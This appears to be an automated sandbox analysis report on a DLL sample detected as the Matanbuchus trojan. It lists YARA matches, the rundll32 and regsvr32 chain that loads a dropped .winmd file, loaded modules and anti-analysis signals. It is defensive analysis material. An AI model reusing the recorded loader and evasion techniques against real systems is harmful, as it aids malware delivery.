                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: classification engine, Classification label: mal100.troj.evad.winDLL@38/6@3/1
                    Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Users\user\8f08
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
                    Source: C:\Windows\SysWOW64\rundll32.exe, Mutant created: \Sessions\1\BaseNamedObjects\8f08
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4032
                    Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\44cea920-5f33-40ba-8521-a63064fc8bcb
                    Source: file.dll, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\rundll32.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                    Source: file.dll, Virustotal: Detection: 13%
                    Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,Export
                    Source: unknown, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,Main
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Export
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                    Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDll
                    Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                    Source: unknown, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: unknown, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\loaddll32.exe, Section loaded: apphelp.dll
                    Source: C:\Windows\System32\loaddll32.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: apphelp.dll
                    Source: C:\Windows\System32\regsvr32.exe, Section loaded: apphelp.dll
                    Source: C:\Windows\System32\regsvr32.exe, Section loaded: aclayers.dll
                    Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc_os.dll
                    Source: C:\Windows\System32\regsvr32.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\regsvr32.exe, Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: aclayers.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: msi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: schannel.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: mskeyprotect.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: ncryptsslp.dll
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                    Source: file.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    Source: Yara matchFile source: file.dll, type: SAMPLE
                    Source: Yara matchFile source: 29.2.regsvr32.exe.6c3f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.6c3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6cc50000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6cc50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.6cc50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.regsvr32.exe.6c3f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.rundll32.exe.6cc50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.4c30000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.4c30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2210377846.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\8f08\user-PC\user-PC.winmd, type: DROPPED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4DD76 push ecx; ret 3_2_7EF4DD89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF787BD push esi; ret 3_2_7EF787C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABDD76 push ecx; ret 5_2_7FABDD89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAE87BD push esi; ret 5_2_7FAE87C6
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07DD76 push ecx; ret 9_2_7F07DD89
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\user-PC\user-PC.winmd
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-34178
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-43684
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_5-44142
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.winmd
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.4 %
                    Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.4 %
                    Source: C:\Windows\SysWOW64\rundll32.exe TID: 5704Thread sleep count: 87 > 30
                    Source: C:\Windows\SysWOW64\rundll32.exe TID: 5704Thread sleep time: -11310000s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF64932 FindFirstFileExW,3_2_7EF64932
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD4932 FindFirstFileExW,5_2_7FAD4932
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F094932 FindFirstFileExW,9_2_7F094932
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA83B0 GetSystemInfo,5_2_7FAA83B0
                    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
                    Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000
                    Source: regsvr32.exe, 0000001B.00000003.2798870432.0000000004EBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seMIuMU8vNI7XcEblccUgqXTLHVMci+pcwt5P1yCoz9Mccccjk4NRvgJgeEAuMUg
                    Source: regsvr32.exe, 0000001B.00000003.2798870432.0000000004EBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GdKGzqRWJxvQJ7GPC4lLWWpNjguBAJ8vvMCINL7BrAi7YLcJrTOLDbspihycTOmm
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-44232
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF51F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_7EF51F06
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC69C40 mov eax, dword ptr fs:[00000030h]3_2_6CC69C40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4AFE0 mov edx, dword ptr fs:[00000030h]3_2_7EF4AFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4AFE0 mov eax, dword ptr fs:[00000030h]3_2_7EF4AFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov edx, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov ecx, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov eax, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF35F00 mov ecx, dword ptr fs:[00000030h]3_2_7EF35F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF21CA0 mov eax, dword ptr fs:[00000030h]3_2_7EF21CA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3BC90 mov ecx, dword ptr fs:[00000030h]3_2_7EF3BC90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37B60 mov ecx, dword ptr fs:[00000030h]3_2_7EF37B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37B60 mov eax, dword ptr fs:[00000030h]3_2_7EF37B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov eax, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov edx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov eax, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3B9A0 mov eax, dword ptr fs:[00000030h]3_2_7EF3B9A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF216A0 mov edx, dword ptr fs:[00000030h]3_2_7EF216A0
